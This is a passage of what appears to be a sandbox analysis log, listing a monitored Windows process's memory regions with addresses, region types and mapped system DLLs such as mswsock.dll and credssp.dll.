0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1080 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1081 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1082 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1083 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1084 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1085 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1086 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1087 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1088 start_va = 0x38b0000 end_va = 0x38b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038b0000" filename = "" Region: id = 1089 start_va = 0x38c0000 end_va = 0x38cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038c0000" filename = "" Region: id = 1090 start_va = 0x6930000 end_va = 0x69effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1091 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1092 start_va = 0x7fefcfe0000 end_va = 0x7fefd034fff monitored = 0 entry_point = 0x7fefcfe1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1093 start_va = 0x9630000 end_va = 0x97affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009630000" filename = "" Region: id = 1094 start_va = 0x97d0000 end_va = 0x984ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000097d0000" filename = "" Region: id = 1095 start_va = 0x7fefc9e0000 end_va = 0x7fefc9e6fff monitored = 0 entry_point = 0x7fefc9e14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1096 start_va = 0x7fefcfd0000 end_va = 0x7fefcfd6fff monitored = 0 entry_point = 0x7fefcfd142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1097 start_va = 0x7fef4f90000 end_va = 0x7fef4f97fff monitored = 0 entry_point = 0x7fef4f91414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1098 start_va = 0x7fef9150000 end_va = 0x7fef91a2fff monitored = 0 entry_point = 0x7fef9152b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1099 start_va = 0x9850000 end_va = 0x9a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1100 start_va = 0x38c0000 end_va = 0x38c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038c0000" filename = "" Region: id = 1101 start_va = 0x9630000 end_va = 0x9729fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009630000" filename = "" Region: id = 1102 start_va = 0x9730000 end_va = 0x97affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009730000" filename = "" Region: id = 1103 start_va = 0x38d0000 end_va = 0x38d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038d0000" filename = "" Region: id = 1104 start_va = 0x9630000 end_va = 0x972ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009630000" filename = "" Region: id = 1105 start_va = 0x9a80000 end_va = 0x9c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a80000" filename = "" Region: id = 1106 start_va = 0x38e0000 end_va = 0x38effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038e0000" filename = "" Region: id = 1107 start_va = 0x46a0000 end_va = 0x46b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 1108 start_va = 0x38e0000 end_va = 0x38edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038e0000" filename = "" Region: id = 1109 start_va = 0x38e0000 end_va = 0x38edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038e0000" filename = "" Region: id = 1110 start_va = 0x9850000 end_va = 0x994ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1111 start_va = 0x9a00000 end_va = 0x9a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a00000" filename = "" Region: id = 1112 start_va = 0x9c80000 end_va = 0x9d81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1113 start_va = 0x9850000 end_va = 0x9954fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1114 start_va = 0x9c80000 end_va = 0x9d86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1115 start_va = 0x9850000 end_va = 0x9959fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1116 start_va = 0x9c80000 end_va = 0x9d8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1117 start_va = 0x9850000 end_va = 0x995efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1118 start_va = 0x38e0000 end_va = 0x38effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038e0000" filename = "" Region: id = 1119 start_va = 0x46a0000 end_va = 0x46b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 1120 start_va = 0x38e0000 end_va = 0x38edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038e0000" filename = "" Region: id = 1121 start_va = 0x38e0000 end_va = 0x38edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038e0000" filename = "" Region: id = 1122 start_va = 0x9c80000 end_va = 0x9d90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1123 start_va = 0x9850000 end_va = 0x9963fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1124 start_va = 0x9c80000 end_va = 0x9d95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1125 start_va = 0x9850000 end_va = 0x9968fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1126 start_va = 0x9c80000 end_va = 0x9d9afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1127 start_va = 0x9850000 end_va = 0x996dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1128 start_va = 0x9c80000 end_va = 0x9d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1129 start_va = 0x9850000 end_va = 0x9972fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1130 start_va = 0x9c80000 end_va = 0x9da4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1131 start_va = 0x9850000 end_va = 0x9977fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1132 start_va = 0x9c80000 end_va = 0x9da9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1133 start_va = 0x9850000 end_va = 0x997cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1134 start_va = 0x9c80000 end_va = 0x9daefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1135 start_va = 0x9850000 end_va = 0x9981fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1136 start_va = 0x9c80000 end_va = 0x9db3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1137 start_va = 0x9850000 end_va = 0x9986fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1138 start_va = 0x9c80000 end_va = 0x9db8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1139 start_va = 0x9850000 end_va = 0x998bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1140 start_va = 0x9c80000 end_va = 0x9dbdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1141 start_va = 0x9850000 end_va = 0x9990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1142 start_va = 0x9c80000 end_va = 0x9dc2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1143 start_va = 0x9850000 end_va = 0x9995fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1144 start_va = 0x9c80000 end_va = 0x9dc7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1145 start_va = 0x9850000 end_va = 0x999afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1146 start_va = 0x9c80000 end_va = 0x9dccfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1147 start_va = 0x38e0000 end_va = 0x38edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038e0000" filename = "" Region: id = 1148 start_va = 0x9850000 end_va = 0x999ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1149 start_va = 0x9c80000 end_va = 0x9dd1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1150 start_va = 0x9850000 end_va = 0x99a4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1151 start_va = 0x9c80000 end_va = 0x9dd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1152 start_va = 0x9850000 end_va = 0x99a9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1153 start_va = 0x9c80000 end_va = 0x9ddbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1154 start_va = 0x9850000 end_va = 0x99aefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1155 start_va = 0x9c80000 end_va = 0x9de0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1156 start_va = 0x9850000 end_va = 0x99b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1157 start_va = 0x9c80000 end_va = 0x9de5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1158 start_va = 0x9850000 end_va = 0x99b8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1159 start_va = 0x9c80000 end_va = 0x9deafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1160 start_va = 0x9850000 end_va = 0x99bdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1161 start_va = 0x9c80000 end_va = 0x9deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1162 start_va = 0x9850000 end_va = 0x99c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1163 start_va = 0x9c80000 end_va = 0x9df4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1164 start_va = 0x9850000 end_va = 0x99c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1165 start_va = 0x38e0000 end_va = 0x38edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038e0000" filename = "" Region: id = 1166 start_va = 0x9c80000 end_va = 0x9df9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1167 start_va = 0x9850000 end_va = 0x99ccfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1168 start_va = 0x9c80000 end_va = 0x9dfefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1169 start_va = 0x9850000 end_va = 0x99d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1170 start_va = 0x38e0000 end_va = 0x38edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038e0000" filename = "" Region: id = 1171 start_va = 0x9c80000 end_va = 0x9e03fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1172 start_va = 0x9850000 end_va = 0x99d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1173 start_va = 0x9c80000 end_va = 0x9e08fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1174 start_va = 0x9850000 end_va = 0x99dbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1175 start_va = 0x9c80000 end_va = 0x9e0dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1176 start_va = 0x9850000 end_va = 0x99e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1177 start_va = 0x9c80000 end_va = 0x9e12fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1178 start_va = 0x9850000 end_va = 0x99e5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1179 start_va = 0x9c80000 end_va = 0x9e17fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1180 start_va = 0x9850000 end_va = 0x99eafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1181 start_va = 0x9c80000 end_va = 0x9e1cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1182 start_va = 0x38e0000 end_va = 0x38edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038e0000" filename = "" Region: id = 1183 start_va = 0x9850000 end_va = 0x99effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1184 start_va = 0x9c80000 end_va = 0x9e21fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1185 start_va = 0x9850000 end_va = 0x99f4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1186 start_va = 0x9c80000 end_va = 0x9e26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1187 start_va = 0x38e0000 end_va = 0x38edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038e0000" filename = "" Region: id = 1188 start_va = 0x9850000 end_va = 0x99f9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1189 start_va = 0x9c80000 end_va = 0x9e2bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1190 start_va = 0x9850000 end_va = 0x99fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1191 start_va = 0x9c80000 end_va = 0x9e30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1192 start_va = 0x9e40000 end_va = 0x9ff3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e40000" filename = "" Region: id = 1193 start_va = 0x9c80000 end_va = 0x9e35fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1194 start_va = 0x9e40000 end_va = 0x9ff8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e40000" filename = "" Region: id = 1195 start_va = 0x9c80000 end_va = 0x9e3afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1196 start_va = 0x9e40000 end_va = 0x9ffdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e40000" filename = "" Region: id = 1197 start_va = 0x9c80000 end_va = 0x9e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1198 start_va = 0x9e40000 end_va = 0xa002fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e40000" filename = "" Region: id = 1199 start_va = 0x38e0000 end_va = 0x38edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038e0000" filename = "" Region: id = 1200 start_va = 0xa010000 end_va = 0xa1d4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a010000" filename = "" Region: id = 1201 start_va = 0x9c80000 end_va = 0x9e47fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1202 start_va = 0x9e50000 end_va = 0xa019fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e50000" filename = "" Region: id = 1203 start_va = 0x9c80000 end_va = 0x9e4cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1204 start_va = 0x9e50000 end_va = 0xa01efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e50000" filename = "" Region: id = 1205 start_va = 0xa020000 end_va = 0xa1f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a020000" filename = "" Region: id = 1206 start_va = 0x9c80000 end_va = 0x9e53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1207 start_va = 0x9e60000 end_va = 0xa036fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e60000" filename = "" Region: id = 1208 start_va = 0x9c80000 end_va = 0x9e58fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1209 start_va = 0x9e60000 end_va = 0xa03bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e60000" filename = "" Region: id = 1210 start_va = 0x9c80000 end_va = 0x9e5dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1211 start_va = 0x9e60000 end_va = 0xa040fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e60000" filename = "" Region: id = 1212 start_va = 0xa050000 end_va = 0xa232fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a050000" filename = "" Region: id = 1213 start_va = 0x9c80000 end_va = 0x9e65fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1214 start_va = 0x9e70000 end_va = 0xa057fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e70000" filename = "" Region: id = 1215 start_va = 0x9c80000 end_va = 0x9e6afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1216 start_va = 0x2580000 end_va = 0x276cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1217 start_va = 0x5e50000 end_va = 0x603ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1218 start_va = 0x2580000 end_va = 0x2771fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1219 start_va = 0x5e50000 end_va = 0x6044fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1220 start_va = 0x2580000 end_va = 0x2776fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1221 start_va = 0x5e50000 end_va = 0x6049fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1222 start_va = 0x2580000 end_va = 0x277bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1223 start_va = 0x5e50000 end_va = 0x604efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1224 start_va = 0x6050000 end_va = 0x6250fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006050000" filename = "" Region: id = 1225 start_va = 0x9c80000 end_va = 0x9e83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1226 start_va = 0x5e50000 end_va = 0x6055fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1227 start_va = 0x6060000 end_va = 0x6268fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006060000" filename = "" Region: id = 1228 start_va = 0x5e50000 end_va = 0x605afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1229 start_va = 0x2580000 end_va = 0x258dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 1230 start_va = 0x6060000 end_va = 0x626dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006060000" filename = "" Region: id = 1231 start_va = 0x5e50000 end_va = 0x605ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1232 start_va = 0x2430000 end_va = 0x243dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 1233 start_va = 0x6060000 end_va = 0x6272fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006060000" filename = "" Region: id = 1246 start_va = 0x7310000 end_va = 0x7524fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 1247 start_va = 0x5e50000 end_va = 0x6067fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1248 start_va = 0x6070000 end_va = 0x6289fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006070000" filename = "" Region: id = 1249 start_va = 0x5e50000 end_va = 0x606cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1250 start_va = 0x6070000 end_va = 0x628efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006070000" filename = "" Region: id = 1251 start_va = 0x7310000 end_va = 0x7531fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 1252 start_va = 0x5e50000 end_va = 0x6073fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1253 start_va = 0x6080000 end_va = 0x62a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006080000" filename = "" Region: id = 1254 start_va = 0x5e50000 end_va = 0x6078fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1255 start_va = 0x2430000 end_va = 0x243dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 1256 start_va = 0x6080000 end_va = 0x62abfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006080000" filename = "" Region: id = 1257 start_va = 0x5e50000 end_va = 0x607dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1258 start_va = 0x6080000 end_va = 0x62b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006080000" filename = "" Region: id = 1259 start_va = 0x7310000 end_va = 0x7542fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 1260 start_va = 0x5e50000 end_va = 0x6085fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1261 start_va = 0x7310000 end_va = 0x7547fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 1262 start_va = 0x5e50000 end_va = 0x608afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1263 start_va = 0x7310000 end_va = 0x754cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 1264 start_va = 0x5e50000 end_va = 0x608ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1265 start_va = 0x7310000 end_va = 0x7551fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 1266 start_va = 0x5e50000 end_va = 0x6094fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1267 start_va = 0x7310000 end_va = 0x7556fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 1268 start_va = 0x5e50000 end_va = 0x6099fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1269 start_va = 0x7310000 end_va = 0x755bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 1270 start_va = 0x5e50000 end_va = 0x609efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1271 start_va = 0x2430000 end_va = 0x243dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 1272 start_va = 0x9c80000 end_va = 0x9ed0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1273 start_va = 0x5e50000 end_va = 0x60a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1274 start_va = 0x9c80000 end_va = 0x9ed5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1275 start_va = 0x5e50000 end_va = 0x60a8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1276 start_va = 0x9c80000 end_va = 0x9edafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1277 start_va = 0x5e50000 end_va = 0x60adfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1278 start_va = 0x9c80000 end_va = 0x9edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1279 start_va = 0x5e50000 end_va = 0x60b2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1280 start_va = 0x9c80000 end_va = 0x9ee4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1281 start_va = 0x5e50000 end_va = 0x60b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1282 start_va = 0x9c80000 end_va = 0x9ee9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1283 start_va = 0x5e50000 end_va = 0x60bcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1284 start_va = 0x9c80000 end_va = 0x9eeefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1285 start_va = 0x5e50000 end_va = 0x60c1fff monitored = 1 entry_point = 0x0 region_type = 